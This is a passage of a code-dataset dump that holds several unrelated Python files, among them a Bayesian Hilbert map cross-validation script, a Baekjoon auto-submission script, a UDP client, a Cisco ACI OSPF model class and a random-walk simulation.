load_query_data(path):\n \"\"\"\n @param path (str): path relative to query_data folder to save data\n \"\"\"\n filename = './query_data/{}'.format(path)\n print(' Reading queried output from ' + filename)\n return torch.load(filename)\n\n# ==============================================================================\n# Train\n# ==============================================================================\ndef train(fn_train, cell_max_min, cell_resolution):\n \"\"\"\n @params: [fn_train, cell_max_min, cell_resolution]\n @returns: []\n Fits the 3D BHM on each frame of the dataset and plots occupancy or regression\n \"\"\"\n print('\\nTraining started---------------')\n alpha = 10**-2\n beta = 10**2\n for framei in range(args.num_frames):\n if args.model_type == \"occupancy\" or args.model_type == \"regression\":\n g, X, y_occupancy, sigma, partitions = utils_filereader.read_frame(args, framei, fn_train, cell_max_min)\n elif args.model_type == \"velocity\":\n X, y_vx, y_vy, y_vz, partitions = utils_filereader.read_frame_velocity(args, framei, fn_train, cell_max_min)\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n\n if args.model_type == 'occupancy':\n train_methods.train_occupancy(args, partitions, cell_resolution, X, y_occupancy, sigma, framei)\n elif args.model_type == 'regression':\n train_methods.train_regression(args, alpha, beta, cell_resolution, cell_max_min, X, y_occupancy, g, sigma[:,:2], framei)\n # For regression, we use sigma dimension 2. This is hard coded in the pass to plot_regression for the sigma term above\n elif args.model_type == \"velocity\": ###===###\n train_methods.train_velocity(args, alpha, beta, X, y_vx, y_vy, y_vz, partitions, cell_resolution, cell_max_min, framei) ###///###\n\n if args.model_type == \"occupancy\" or args.model_type == \"regression\":\n del g, X, y_occupancy, sigma, partitions\n elif args.model_type == \"velocity\":\n del X, y_vx, y_vy, y_vz, partitions\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n print('Training completed---------------\\n')\n\n\n# ==============================================================================\n# Query\n# ==============================================================================\ndef query(fn_train, cell_max_min):\n \"\"\"\n @params: [fn_train, cell_max_min]\n @returns: []\n Queries the 3D BHM for occupancy or regression on each frame of the dataset\n \"\"\"\n print('Querying started---------------')\n for framei in range(args.num_frames):\n if args.model_type == \"occupancy\" or args.model_type == \"regression\":\n g, X, y_occupancy, sigma, partitions = utils_filereader.read_frame(args, framei, fn_train, cell_max_min)\n elif args.model_type == \"velocity\":\n X, y_vx, y_vy, y_vz, partitions = utils_filereader.read_frame_velocity(args, framei, fn_train, cell_max_min)\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n\n if args.model_type == 'occupancy':\n query_methods.query_occupancy(args, partitions, X, y_occupancy, framei)\n elif args.model_type == 'regression':\n query_methods.query_regression(args, cell_max_min, X, y_occupancy, g, framei)\n elif args.model_type == \"velocity\": ###===###\n query_methods.query_velocity(args, X, y_vx, y_vy, y_vz, partitions, cell_resolution, cell_max_min, framei) ###///###\n\n if args.model_type == \"occupancy\" or args.model_type == \"regression\":\n del g, X, y_occupancy, sigma, partitions\n elif args.model_type == \"velocity\":\n del X, y_vx, y_vy, y_vz, partitions\n else:\n raise ValueError(\"Unknown model type: \\\"{}\\\"\".format(args.model_type))\n print('Querying completed---------------\\n')\n\n# ==============================================================================\n# Plot\n# ==============================================================================\ndef plot():\n \"\"\"\n @params: []\n @returns: []\n Plots data loaded from the args.save_query_data_path parameter\n \"\"\"\n print('Plotting started---------------')\n plotter = BHM_PLOTTER(args, args.plot_title, args.surface_threshold, args.query_dist, occupancy_plot_type=args.occupancy_plot_type)\n for framei in range(args.num_frames):\n if args.model_type == 'occupancy':\n print(\"\\nPlotting occupancy datapoints for frame %d ...\" % framei)\n occupancyPlot, X, y, framei = load_query_data('occupancy/{}_f{}'.format(args.save_query_data_path, framei))\n plotter.plot_occupancy_frame(occupancyPlot, X, y, framei)\n elif args.model_type == 'regression':\n print(\"\\nPlotting regression datapoints for frame %d ...\" % framei)\n meanVarPlot, filtered, framei, cell_max_min = load_query_data('regression/{}_f{}'.format(args.save_query_data_path, framei))\n plotter.plot_regression_frame(meanVarPlot, filtered, framei, cell_max_min)\n elif args.model_type == \"velocity\": ###===###\n X, y_vx, y_vy, y_vz, Xq_mv, mean_x, mean_y, mean_z, framei = load_query_data('velocity/{}_f{}'.format(args.save_query_data_path, framei))\n # print(\"(plot) X.shape:\", X.shape)\n # exit()\n plotter.plot_velocity_frame(X, y_vx, y_vy, y_vz, Xq_mv, mean_x, mean_y, mean_z, framei)\n print('Plotting completed---------------\\n')\n\n\n\n# ==============================================================================\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n # Settings Arguments\n parser.add_argument('--mode', type=str, help='tqp: Train Query and Plot, to: Train only, qo: Query only, po: Plot only')\n parser.add_argument('--num_frames', type=int, help='Number of data frames')\n parser.add_argument('--config', type=str, help='Path to the config to load relative to the config folder')\n parser.add_argument('--save_config', type=str, help='Saves the argparse config to path if set relative to the config folder')\n\n # Train Arguments\n parser.add_argument('--model_type', type=str, help='Model type (occupancy vs regression)')\n parser.add_argument('--likelihood_type', type=str, help='Likelihood type (Gamma, Gaussian)')\n parser.add_argument('--dataset_path', type=str, help='Path to dataset')\n parser.add_argument('--area_min', nargs=3, type=int, help='X Y Z minimum coordinates in bounding box (3 values)')\n parser.add_argument('--area_max', nargs=3, type=int, help='X Y Z maximum coordinates in bounding box (3 values)')\n parser.add_argument('--hinge_type', type=str, help='Hinge point type (grid or hit_locations)')\n parser.add_argument('--hinge_dist', nargs=3, type=int, help='X Y Z hinge point resolution (3 values)')\n parser.add_argument('--kernel_type', type=str, help='Type of RBF kernel: Vanilla RBF(), Convolution (conv), Wasserstein (wass)')\n parser.add_argument('--gamma', nargs='+', type=float, help='X Y Z Gamma (1-3 values)')\n parser.add_argument('--num_partitions', nargs=3, type=int, help='X Y Z number of partitions per axis (3 values)')\n parser.add_argument('--partition_bleed', type=float, help='Amount of bleed between partitions for plot stitching')\n parser.add_argument('--save_model_path', type=str, help='Path to save each model \\\n (i.e. save_model_path is set to \\\"toy3_run0\\\", then the model at partition 1, frame 1 would save to \\\n mdls/occupancy/toy3_run0_f1_p1)'\n )\n\n # Query Arguments\n parser.add_argument('--query_dist', nargs=3, type=float, help='X Y Z Q-resolution (3 values). If any value is\\\n negative, a 4th value should be provided to slice the corresponding axis. If all negative, X_query=X_train.')\n parser.add_argument('--query_blocks', type=int, default=None, help='How many blocks to break the query method into')\n parser.add_argument('--eval_path', type=str, help='Path of the evaluation dataset')\n parser.add_argument('--eval', type=int, help='1=evaluate metrics, 0, otherwise. Use data in --eval_path, if given.')\n parser.add_argument('--save_query_data_path', type=str, help='Path save each set of queried data \\\n (i.e. save_model_path is set to \\\"toy3_run0\\\" and the model type is set to occupancy, \\\n then the model at frame 1 would save to query_data/occupancy/toy3_run0_f1_p1)'\n )\n\n # Plot Arguments\n parser.add_argument('--occupancy_plot_type', type=str, help='Plot occupancy as scatter or volumetric plot')\n parser.add_argument('--plot_title', type=str, help='')\n parser.add_argument('--surface_threshold', nargs=2, type=float, help='Minimum threshold to show surface prediction on plot. Min or [Min, Max]')\n\n args = parser.parse_args()\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n # Set arguments according to the following Priority (High->Low):\n # 1:CL provided arguments, 2: config provided arguments, 3:default arguments\n if args.config:\n config = json.load(open('./configs/' + args.config, 'r'))\n defaults = json.load(open('./configs/defaults', 'r'))\n for key in vars(args):\n if key == 'save_config': continue\n if getattr(args, key): continue\n if key in config and config[key]:\n args.__dict__[key] = config[key]\n else:\n args.__dict__[key] = defaults[key]\n if args.save_config:\n with open('./configs/' + args.save_config, 'w') as f:\n json.dump(args.__dict__, f, indent=2)\n assert len(args.gamma) <= 3, 'Cannot support gamma with greater than dimension 3.'\n\n fn_train, cell_max_min, cell_resolution = utils_filereader.format_config(args)\n\n global gamma_vals\n gamma_vals = [0.01, 0.1, 0.5, 1, 5, 10, 100, 200, 300]\n hinge_dist_factor = [1, 1.5, 2, 4]\n args.hinge_dist_orig = args.hinge_dist\n for fi in hinge_dist_factor:\n for gi in gamma_vals:\n args.gamma = [gi]\n args.hinge_dist = [args.hinge_dist_orig[0]/fi, args.hinge_dist_orig[1]/fi, args.hinge_dist_orig[2]/fi]\n args.report_notes = 'scale_factor={}; hinge_dist={}; gamma={}'.format(fi, args.hinge_dist, args.gamma)\n print('\\n=============================================')\n print(args.report_notes)\n\n if args.mode == 'tqp' or args.mode == 't':\n train(fn_train, cell_max_min, cell_resolution)\n if args.mode == 'tqp' or args.mode == 'q':\n query(fn_train, cell_max_min)\n if args.mode == 'tqp' or args.mode == 'p':\n plot()\n if args.mode == 'tq':\n train(fn_train, cell_max_min, cell_resolution)\n query(fn_train, cell_max_min)\n if args.mode == 'qp':\n query(fn_train, cell_max_min)\n plot()\n\n print(\"Mission complete!\\n\\n\")\n","sub_path":"spatun_crossval.py","file_name":"spatun_crossval.py","file_ext":"py","file_size_in_byte":12026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"190155531","text":"\n\n#calss header\nclass _ROYAL():\n\tdef __init__(self,): \n\t\tself.name = \"ROYAL\"\n\t\tself.definitions = [u'belonging or connected to a king or queen or a member of their family: ', u'good or excellent, as if intended for or typical of royalty: ', u'big or great: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_royal.py","file_name":"_royal.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433685097","text":"import sys\nimport requests\nfrom bs4 import BeautifulSoup as bs\n\nuserID = '아이디' # 아이디 \nuserPW = '비밀번호' # 비밀번호\n\nlanguages = {\n 'python3' : {'code': '28', 'exts' : 'py'},\n 'cpp' : {'code': '1', 'exts' : 'cpp'},\n 'java' : {'code': '3', 'exts' : 'java'}\n}\n\nloginURL = 'https://www.acmicpc.net/signin'\nloginData = {'login_user_id': userID, 'login_password': userPW, 'next': '/', 'stack': '0'}\n\nprobNum = sys.argv[1]\ntry:\n lang = sys.argv[2]\nexcept:\n lang = 'python3' # 디폴트\n\nwith requests.Session() as sess:\n login = sess.post(loginURL, data=loginData)\n\n submitURL = 'https://www.acmicpc.net/submit/' + str(probNum)\n\n temp = bs(sess.get(submitURL).text, 'html.parser')\n csrf_key = temp.find('input', {'name': 'csrf_key'})['value']\n\n source = open(probNum+'.'+languages[lang]['exts'], mode='rt', encoding='utf-8')\n sourceCode = source.read()\n\n submitData = {\n 'problem_id': probNum,\n 'language': languages[lang]['code'],\n 'code_open': 'close', # close : 비공개 open : 공개, onlyaccepted : 맞았을 때만 공개\n 'source': sourceCode,\n 'csrf_key' : csrf_key\n }\n\n sub = sess.post(submitURL, data=submitData)\n judge = ''\n judgeStatus = ['맞았습니다!!','틀렸습니다', '런타임 에러', '시간 초과']\n\n while True:\n status = sess.get('https://www.acmicpc.net/status?user_id='+userID).text\n temp = bs(status, 'html.parser')\n judge = temp.find('span', {'class': 'result-text'}).text\n if judge in judgeStatus:\n sys.stdout.write('\\r***{}***'.format(judge))\n sys.stdout.write('\\n')\n break\n else:\n sys.stdout.write('\\r' + judge)","sub_path":"submit.py","file_name":"submit.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"255701572","text":"# import library socket karena akan menggunakan IPC socket\nimport socket\n\n# definisikan target IP server yang akan dituju\nhost=\"10.20.1.250\"\n\n# definisikan target port number server yang akan dituju\nport = 50007\n\n#print (\"target IP:\", UDP_IP)\nprint(\"target ip : \", host)\n#print (\"target port:\", UDP_PORT)\nprint(\"target port : \", port)\n#print (\"pesan:\", PESAN)\npesan = \"udukudukudukuduk\"\nprint(\"pesan : \", pesan)\n\n# buat socket bertipe UDP\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n\n# lakukan loop 10 kali\nfor x in range (10):\n # definisikan pesan yang akan dikirim\n msg = pesan.encode()\n \n # kirim pesan\n s.sendto(msg, (host, port))\n \n ","sub_path":"TUGAS_SISTER_IPC_KEL8_IFIK4004/No.2/02.tugas_udp_client.py","file_name":"02.tugas_udp_client.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629710940","text":"from unittest import TestCase\nimport development\n\n\nclass TestModelDevelopment(TestCase):\n\n def test_model(self):\n # arrange\n train = development.train\n test = development.test\n X = development.X\n y = development.y\n\n # act\n file = open('model.pkl', 'rb')\n file.close()\n\n # assert\n assert len(train) == 891\n assert len(test) == 418\n assert len(X.columns) == 6\n assert len(y) == 891\n assert file\n","sub_path":"Chapter12/Activity12.01/test_development.py","file_name":"test_development.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"202332395","text":"# coding=UTF-8\n# **********************************************************************\n# Copyright (c) 2013-2020 Cisco Systems, Inc. All rights reserved\n# written by zen warriors, do not modify!\n# **********************************************************************\n\n\nfrom cobra.mit.meta import ClassMeta\nfrom cobra.mit.meta import StatsClassMeta\nfrom cobra.mit.meta import CounterMeta\nfrom cobra.mit.meta import PropMeta\nfrom cobra.mit.meta import Category\nfrom cobra.mit.meta import SourceRelationMeta\nfrom cobra.mit.meta import NamedSourceRelationMeta\nfrom cobra.mit.meta import TargetRelationMeta\nfrom cobra.mit.meta import DeploymentPathMeta, DeploymentCategory\nfrom cobra.model.category import MoCategory, PropCategory, CounterCategory\nfrom cobra.mit.mo import Mo\n\n\n# ##################################################\nclass CtxDef(Mo):\n \"\"\"\n The context-level OSPF definition.\n\n \"\"\"\n\n meta = ClassMeta(\"cobra.model.ospf.CtxDef\")\n\n meta.moClassName = \"ospfCtxDef\"\n meta.rnFormat = \"ospfCtxP\"\n meta.category = MoCategory.REGULAR\n meta.label = \"Context Policy Definition\"\n meta.writeAccessMask = 0x1\n meta.readAccessMask = 0x1\n meta.isDomainable = False\n meta.isReadOnly = True\n meta.isConfigurable = False\n meta.isDeletable = False\n meta.isContextRoot = False\n\n meta.childClasses.add(\"cobra.model.fault.Delegate\")\n\n meta.childNamesAndRnPrefix.append((\"cobra.model.fault.Delegate\", \"fd-\"))\n\n meta.parentClasses.add(\"cobra.model.fv.RtdEpP\")\n meta.parentClasses.add(\"cobra.model.l3ext.RtdOutDef\")\n meta.parentClasses.add(\"cobra.model.fv.BrEpP\")\n\n meta.superClasses.add(\"cobra.model.fabric.L3CtxPol\")\n meta.superClasses.add(\"cobra.model.fabric.ProtoPol\")\n meta.superClasses.add(\"cobra.model.ospf.ACtxPol\")\n meta.superClasses.add(\"cobra.model.fabric.ProtoDomPol\")\n meta.superClasses.add(\"cobra.model.naming.NamedObject\")\n meta.superClasses.add(\"cobra.model.pol.Obj\")\n meta.superClasses.add(\"cobra.model.pol.Def\")\n meta.superClasses.add(\"cobra.model.fabric.L3DomPol\")\n\n meta.rnPrefixes = [\n ('ospfCtxP', False),\n ]\n\n prop = PropMeta(\"str\", \"bwRef\", \"bwRef\", 1089, PropCategory.REGULAR)\n prop.label = \"Bandwidth Preference\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 4000000)]\n prop.defaultValue = 40000\n prop.defaultValueStr = \"40000\"\n meta.props.add(\"bwRef\", prop)\n\n prop = PropMeta(\"str\", \"childAction\", \"childAction\", 4, PropCategory.CHILD_ACTION)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"deleteAll\", \"deleteall\", 16384)\n prop._addConstant(\"deleteNonPresent\", \"deletenonpresent\", 8192)\n prop._addConstant(\"ignore\", \"ignore\", 4096)\n meta.props.add(\"childAction\", prop)\n\n prop = PropMeta(\"str\", \"ctrl\", \"ctrl\", 22755, PropCategory.REGULAR)\n prop.label = \"Control knobs\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop._addConstant(\"name-lookup\", \"enable-name-lookup-for-router-ids\", 2)\n prop._addConstant(\"pfx-suppress\", \"prefix-suppression\", 1)\n meta.props.add(\"ctrl\", prop)\n\n prop = PropMeta(\"str\", \"descr\", \"descr\", 5579, PropCategory.REGULAR)\n prop.label = \"Description\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 128)]\n prop.regex = ['[a-zA-Z0-9\\\\!#$%()*,-./:;@ _{|}~?&+]+']\n meta.props.add(\"descr\", prop)\n\n prop = PropMeta(\"str\", \"dist\", \"dist\", 1087, PropCategory.REGULAR)\n prop.label = \"Distance Preference\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 255)]\n prop.defaultValue = 110\n prop.defaultValueStr = \"110\"\n meta.props.add(\"dist\", prop)\n\n prop = PropMeta(\"str\", \"dn\", \"dn\", 1, PropCategory.DN)\n prop.label = \"None\"\n prop.isDn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"dn\", prop)\n\n prop = PropMeta(\"str\", \"grCtrl\", \"grCtrl\", 1098, PropCategory.REGULAR)\n prop.label = \"Graceful Restart Controls\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.defaultValue = 1\n prop.defaultValueStr = \"helper\"\n prop._addConstant(\"helper\", \"graceful-restart-helper\", 1)\n meta.props.add(\"grCtrl\", prop)\n\n prop = PropMeta(\"str\", \"lcOwn\", \"lcOwn\", 9, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"local\"\n prop._addConstant(\"implicit\", \"implicit\", 4)\n prop._addConstant(\"local\", \"local\", 0)\n prop._addConstant(\"policy\", \"policy\", 1)\n prop._addConstant(\"replica\", \"replica\", 2)\n prop._addConstant(\"resolveOnBehalf\", \"resolvedonbehalf\", 3)\n meta.props.add(\"lcOwn\", prop)\n\n prop = PropMeta(\"str\", \"lsaArrivalIntvl\", \"lsaArrivalIntvl\", 1094, PropCategory.REGULAR)\n prop.label = \"Min Arrival Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(10, 600000)]\n prop.defaultValue = 1000\n prop.defaultValueStr = \"1000\"\n meta.props.add(\"lsaArrivalIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaGpPacingIntvl\", \"lsaGpPacingIntvl\", 1093, PropCategory.REGULAR)\n prop.label = \"Pacing Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 1800)]\n prop.defaultValue = 10\n prop.defaultValueStr = \"10\"\n meta.props.add(\"lsaGpPacingIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaHoldIntvl\", \"lsaHoldIntvl\", 1096, PropCategory.REGULAR)\n prop.label = \"Throttle Hold Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(50, 30000)]\n prop.defaultValue = 5000\n prop.defaultValueStr = \"5000\"\n meta.props.add(\"lsaHoldIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaMaxIntvl\", \"lsaMaxIntvl\", 1097, PropCategory.REGULAR)\n prop.label = \"Throttle Max Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(50, 30000)]\n prop.defaultValue = 5000\n prop.defaultValueStr = \"5000\"\n meta.props.add(\"lsaMaxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"lsaStartIntvl\", \"lsaStartIntvl\", 1095, PropCategory.REGULAR)\n prop.label = \"Throttle Start Wait Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 5000)]\n prop.defaultValue = 0\n prop.defaultValueStr = \"0\"\n meta.props.add(\"lsaStartIntvl\", prop)\n\n prop = PropMeta(\"str\", \"maxEcmp\", \"maxEcmp\", 1088, PropCategory.REGULAR)\n prop.label = \"Max ECMP\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 64)]\n prop.defaultValue = 8\n prop.defaultValueStr = \"8\"\n meta.props.add(\"maxEcmp\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaAction\", \"maxLsaAction\", 17808, PropCategory.REGULAR)\n prop.label = \"Action\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"reject\"\n prop._addConstant(\"log\", \"log\", 2)\n prop._addConstant(\"reject\", \"reject\", 0)\n prop._addConstant(\"restart\", \"restart\", 1)\n meta.props.add(\"maxLsaAction\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaNum\", \"maxLsaNum\", 17803, PropCategory.REGULAR)\n prop.label = \"Maximum # of non self-generated LSAs\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 4294967295)]\n prop.defaultValue = 20000\n prop.defaultValueStr = \"20000\"\n meta.props.add(\"maxLsaNum\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaResetIntvl\", \"maxLsaResetIntvl\", 17807, PropCategory.REGULAR)\n prop.label = \"Reset Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 1440)]\n prop.defaultValue = 10\n prop.defaultValueStr = \"10\"\n meta.props.add(\"maxLsaResetIntvl\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaSleepCnt\", \"maxLsaSleepCnt\", 17805, PropCategory.REGULAR)\n prop.label = \"Sleep Count\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 4294967295)]\n prop.defaultValue = 5\n prop.defaultValueStr = \"5\"\n meta.props.add(\"maxLsaSleepCnt\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaSleepIntvl\", \"maxLsaSleepIntvl\", 17806, PropCategory.REGULAR)\n prop.label = \"Sleep Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 1440)]\n prop.defaultValue = 5\n prop.defaultValueStr = \"5\"\n meta.props.add(\"maxLsaSleepIntvl\", prop)\n\n prop = PropMeta(\"str\", \"maxLsaThresh\", \"maxLsaThresh\", 17804, PropCategory.REGULAR)\n prop.label = \"Threshold\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 100)]\n prop.defaultValue = 75\n prop.defaultValueStr = \"75\"\n meta.props.add(\"maxLsaThresh\", prop)\n\n prop = PropMeta(\"str\", \"modTs\", \"modTs\", 7, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop.defaultValue = 0\n prop.defaultValueStr = \"never\"\n prop._addConstant(\"never\", \"never\", 0)\n meta.props.add(\"modTs\", prop)\n\n prop = PropMeta(\"str\", \"name\", \"name\", 4991, PropCategory.REGULAR)\n prop.label = \"Name\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 64)]\n prop.regex = ['[a-zA-Z0-9_.:-]+']\n meta.props.add(\"name\", prop)\n\n prop = PropMeta(\"str\", \"nameAlias\", \"nameAlias\", 28417, PropCategory.REGULAR)\n prop.label = \"Name alias\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 63)]\n prop.regex = ['[a-zA-Z0-9_.-]+']\n meta.props.add(\"nameAlias\", prop)\n\n prop = PropMeta(\"str\", \"ownerKey\", \"ownerKey\", 15230, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 128)]\n prop.regex = ['[a-zA-Z0-9\\\\!#$%()*,-./:;@ _{|}~?&+]+']\n meta.props.add(\"ownerKey\", prop)\n\n prop = PropMeta(\"str\", \"ownerTag\", \"ownerTag\", 15231, PropCategory.REGULAR)\n prop.label = \"None\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(0, 64)]\n prop.regex = ['[a-zA-Z0-9\\\\!#$%()*,-./:;@ _{|}~?&+]+']\n meta.props.add(\"ownerTag\", prop)\n\n prop = PropMeta(\"str\", \"rn\", \"rn\", 2, PropCategory.RN)\n prop.label = \"None\"\n prop.isRn = True\n prop.isImplicit = True\n prop.isAdmin = True\n prop.isCreateOnly = True\n meta.props.add(\"rn\", prop)\n\n prop = PropMeta(\"str\", \"spfHoldIntvl\", \"spfHoldIntvl\", 1091, PropCategory.REGULAR)\n prop.label = \"Max Hold Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 600000)]\n prop.defaultValue = 1000\n prop.defaultValueStr = \"1000\"\n meta.props.add(\"spfHoldIntvl\", prop)\n\n prop = PropMeta(\"str\", \"spfInitIntvl\", \"spfInitIntvl\", 1090, PropCategory.REGULAR)\n prop.label = \"Initial Delay Interval\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 600000)]\n prop.defaultValue = 200\n prop.defaultValueStr = \"200\"\n meta.props.add(\"spfInitIntvl\", prop)\n\n prop = PropMeta(\"str\", \"spfMaxIntvl\", \"spfMaxIntvl\", 1092, PropCategory.REGULAR)\n prop.label = \"Min Wait Time\"\n prop.isConfig = True\n prop.isAdmin = True\n prop.range = [(1, 600000)]\n prop.defaultValue = 5000\n prop.defaultValueStr = \"5000\"\n meta.props.add(\"spfMaxIntvl\", prop)\n\n prop = PropMeta(\"str\", \"status\", \"status\", 3, PropCategory.STATUS)\n prop.label = \"None\"\n prop.isImplicit = True\n prop.isAdmin = True\n prop._addConstant(\"created\", \"created\", 2)\n prop._addConstant(\"deleted\", \"deleted\", 8)\n prop._addConstant(\"modified\", \"modified\", 4)\n meta.props.add(\"status\", prop)\n\n def __init__(self, parentMoOrDn, markDirty=True, **creationProps):\n namingVals = []\n Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)\n\n\n\n# End of package file\n# ##################################################\n","sub_path":"venv/Lib/site-packages/cobra/modelimpl/ospf/ctxdef.py","file_name":"ctxdef.py","file_ext":"py","file_size_in_byte":11594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"549083001","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef randpath(T):\n x=[0]\n t=[0]\n x2ave=[0]*T\n for i in range(T):\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1)\n else:\n x.append(x[-1]-1)\n x2ave[i]=x2ave[i]+x[-1]**2\n return x,t,x2ave\nx,t,x2ave=randpath(100)\nx1,t1,x2ave1=randpath(100)\nfig = plt.figure(figsize=(10, 5))\nplt.plot(t,x,'o',ms=4,color='red')\nplt.plot(t1,x1,'o',ms=4,color='blue')\nplt.xlabel('time(step number)')\nplt.ylabel('X')\nplt.title('random walk in one dimension')\n\n\n#----------\naverage=[0]*101\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)):\n average[j]=average[j]+x1[j]/5000\nplt.figure(figsize=(10,5))\nplt.ylim(-0.5,0.5)\nplt.grid()\nplt.plot(t1,average)\nplt.xlabel('time(step number)')\nplt.ylabel('')\nplt.title('random walk in one dimension')\nplt.text(0,0.15,' versus time')\n#-----------\\\nx2ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x2ave[j]=x2ave[j]+x2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,x2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('')\nplt.title('random walk in one dimension')\nplt.text(10,80,' versus time')\nk,b=np.polyfit(t0,x2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n#------\nx4ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x4ave[j]=x4ave[j]+x1[j+1]**4/5000\n\nplt.figure(figsize=(10,5))\nplt.grid()\nplt.plot(t0,x4ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('')\nplt.title('random walk in one dimension')\na,b,c=np.polyfit(t0,x4ave,2)\nideal4=[]\nfor i in range(100):\n ideal4.append(a*i**2+b*i+c)\nplt.plot(t0,ideal4,color='red')\nplt.text(20,20000,'versus time')\nprint(a,b,c)\n \n \n \n\n\n \n\n\n\n","sub_path":"final/randpath副本.py","file_name":"randpath副本.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"420843605","text":"\"\"\"\nGets contextual information about the occurences of words and\ngroup by word.\n\nThe query expects a file with a list of the words to search for, one\nper line.\n\nWords are normalized, by removing all 'a-z|A-Z' characters before\ncomparing with the list of words to search for.\n\nThe result is of form, for example:\n\n WORD:\n - { \"title\": TITLE,\n \"place\": PLACE,\n \"publisher\": PUBLISHER,\n \"page\": PAGE,\n \"text\": TEXT,\n \"year\": YEAR }\n - { ... }\n ...\n WORD:\n ...\n\"\"\"\n\nfrom defoe.alto import utils\n\n\ndef do_query(archives, words_file, logger=None):\n \"\"\"\n Gets contextual information about the occurences of words\n and group by word.\n\n @param archives: Archives holding Documents\n @type archives: pyspark.rdd.PipelinedRDD with Archives.\n @param words_file: File with list of words to search for,\n one per line\n @type words_file: str or unicode\n @param logger: Logger\n \"\"\"\n search_words = []\n with open(words_file, \"r\") as f:\n search_words = [word.strip() for word in list(f)]\n\n documents = archives.flatMap(\n lambda archive: [document for document in list(archive)])\n\n words = documents.flatMap(\n lambda document: [\n (document, page, utils.normalize(word))\n for (page, word) in document.scan_words()\n ])\n\n filtered_words 